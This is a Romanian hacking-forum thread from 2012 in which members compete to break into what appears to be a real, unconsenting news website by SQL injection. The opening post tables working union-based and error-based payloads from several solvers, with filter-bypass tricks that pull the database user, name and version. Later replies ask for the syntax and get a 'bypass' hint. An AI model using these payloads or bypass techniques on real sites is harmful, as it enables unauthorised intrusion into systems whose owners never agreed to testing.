Wubi Posted October 3, 2012 Report Posted October 3, 2012 (edited) Nu...Target: News: Scene sexy per Alanis - NewsicMetoda: Union BasedCerinte: User(),Database() sau Version().Proof:Site-ul e gasit de Sheyken...[TABLE=class: grid, width: 800][TR][TD]Solvers:[/TD][TD]Syntax:[/TD][/TR][TR][TD]Sheyken[/TD][TD]+union%0Aselect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,version(),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- /* and */ ?id=-25890+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--[/TD][/TR][TR][TD]fallen_angel[/TD][TD]?id=-25890+uNion+/*!se%6cect*/+1,2,3,4,5,6,7,@@version,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--+-[/TD][/TR][TR][TD]neo.hapsis[/TD][TD]?id=null%0Dunion%0Dselect+1,2,3,4,5,NULL,0x3c623e6e656f2e686170736973,0x7468616e6b7320666f7220746865206368616c6c656e6765,9,10,11,12,13,14,group_concat(user(),0x3a,database(),0x3a,version()),16,17,18,19,20,21,22,23,24,25,26,NULL,28,29,30--[/TD][/TR][TR][TD]Sweby[/TD][TD]?id=25890+and+1=2+UNION%0BSELECT+1,2,3,4,5,user(),group_concat(version(),0x3a,database()),8,9,10,11,12,13,14,concat(0x49206861746520746f20627970617373207468696e6773),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--+/*[/TD][/TR][TR][TD][/TD][TD]-[/TD][/TR][TR][TD][/TD][TD]-[/TD][/TR][TR][TD][/TD][TD]-[/TD][/TR][TR][TD][/TD][TD]-[/TD][/TR][TR][TD][/TD][TD]-[/TD][/TR][TR][TD][/TD][TD]-[/TD][/TR][TR][TD][/TD][TD]-[/TD][/TR][TR][TD][/TD][TD]-[/TD][/TR][TR][TD][/TD][TD]-[/TD][/TR][TR][TD][/TD][TD]-[/TD][/TR][TR][TD][/TD][TD]-[/TD][/TR][TR][TD][/TD][TD]-[/TD][/TR][TR][TD][/TD][TD]-[/TD][/TR][TR][TD][/TD][TD]-[/TD][/TR][TR][TD][/TD][TD]-[/TD][/TR][/TABLE] Edited October 8, 2012 by Wubi
fallen_angel Posted October 3, 2012 Report Posted October 3, 2012 Ai PM. Nu mai urc poz? c?-s pe digi mobil ?i merge ca ochiu mortului
EterNo Posted October 5, 2012 Report Posted October 5, 2012 ar fi frumos dupa ce terminati competitia sa postati si o syntaxa sa intelegem si noi, eu numaru de coloane am reusit sa-l gasesc da dupa imi da ACCES NEGAT cand scriu select
Wubi Posted October 5, 2012 Author Report Posted October 5, 2012 ar fi frumos dupa ce terminati competitia sa postati si o syntaxa sa intelegem si noi, eu numaru de coloane am reusit sa-l gasesc da dupa imi da ACCES NEGAT cand scriu select Daca ai fi urmarit challenge-urile precedente(https://rstcenter.com/forum/59702-easy-sqli-2-a.rst ; https://rstcenter.com/forum/59689-easy-tricky-sqli.rst), ori chiar mai atent tabelul cu solveri din primul post, al 2lea row este dedicat sintaxelor folosite. Cand voi decide sa termin challenge-ul voi adauga si sintaxele. Pana atunci mai incearca, hint: bypass.
Wubi Posted October 8, 2012 Author Report Posted October 8, 2012 Cand vedem rezultatele? Acum.Closed.
